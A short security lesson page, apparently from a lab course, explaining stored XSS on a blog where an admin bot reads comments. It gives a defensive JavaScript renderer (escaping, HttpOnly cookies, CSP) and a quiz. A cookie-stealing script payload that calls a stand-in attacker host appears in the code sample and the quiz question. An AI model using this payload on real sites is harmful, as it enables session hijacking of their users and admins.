Step 01 · watch first
A primer on the comment that runs.
A short walkthrough of stored XSS — how an ordinary blog comment turns into a script running in the admin's browser, how that browser hands you the admin's login pass, and the three separate fixes that would each have stopped it. Watch it through, then move on to the animated walkthrough.
Lesson · Stored XSS & cookie theft
~8 min
Summary
what to remember
1. Some pages show your comment. Some pages obey it. A blog that treats your text as real HTML is a stage — and any visitor can write the next scene.
2. A comment that runs isn't a comment — it's a trap. The root cause: the site showed your input as code instead of as text, and saved it exactly as you wrote it.
3. An admin keeps checking this blog. An automated browser opens new comments every 30 seconds, carrying the real admin login pass.
4. The script runs as if it were the admin — so it can read the login cookie with document.cookie and send it to you with fetch().
5. Defence in layers. Show input as text, mark cookies HttpOnly, add a Content Security Policy. Any one of the three would have stopped you.
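The three defences from point 5, written out as an added example that is not part of this lesson: a comment renderer in plain JavaScript. It assumes a Node.js-style handler that returns headers and a body, and uses a constructed sample comment matching the one in the quick check below.

```javascript
// Added example (not the lesson's own code): the three layered defences from
// the summary, applied to a blog comment renderer. Assumes a Node.js-style
// handler that returns { headers, body }; the framework wiring is left out.

// 1. Show input as text: HTML-encode every character that could open a tag or
//    attribute, so "<script>" reaches the page as literal characters.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

function renderComment(comment) {
  return `<li class="comment">${escapeHtml(comment)}</li>`;
}

// 2. Mark the session cookie HttpOnly (plus Secure and SameSite), so
//    document.cookie cannot read it even if a script does get to run.
function sessionCookieHeader(sessionId) {
  return `session=${sessionId}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// 3. A Content Security Policy restricted to the site's own origin blocks both
//    an inline <script> and a fetch() to an outside host.
const CSP = "default-src 'self'; script-src 'self'; connect-src 'self'; " +
            "object-src 'none'; base-uri 'none'";

// Constructed sample input: the comment used in the quick check.
const SAMPLE_COMMENT = "<script>fetch('//attacker?c='+document.cookie)</script>";

function buildResponse(comments, sessionId) {
  return {
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      'Content-Security-Policy': CSP,
      'Set-Cookie': sessionCookieHeader(sessionId),
    },
    body: `<ul>${comments.map(renderComment).join('')}</ul>`,
  };
}
```

Each layer stands alone: removing escapeHtml() would let the comment render as markup, but the cookie would still be unreadable and the script blocked by the policy.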
Quick check · before you continue
1 question · pick one
Q: A blog shows comments as real HTML instead of plain text. You post <script>fetch('//attacker?c='+document.cookie)</script>, and an automated admin browser opens the comment. Where does the admin's login cookie end up?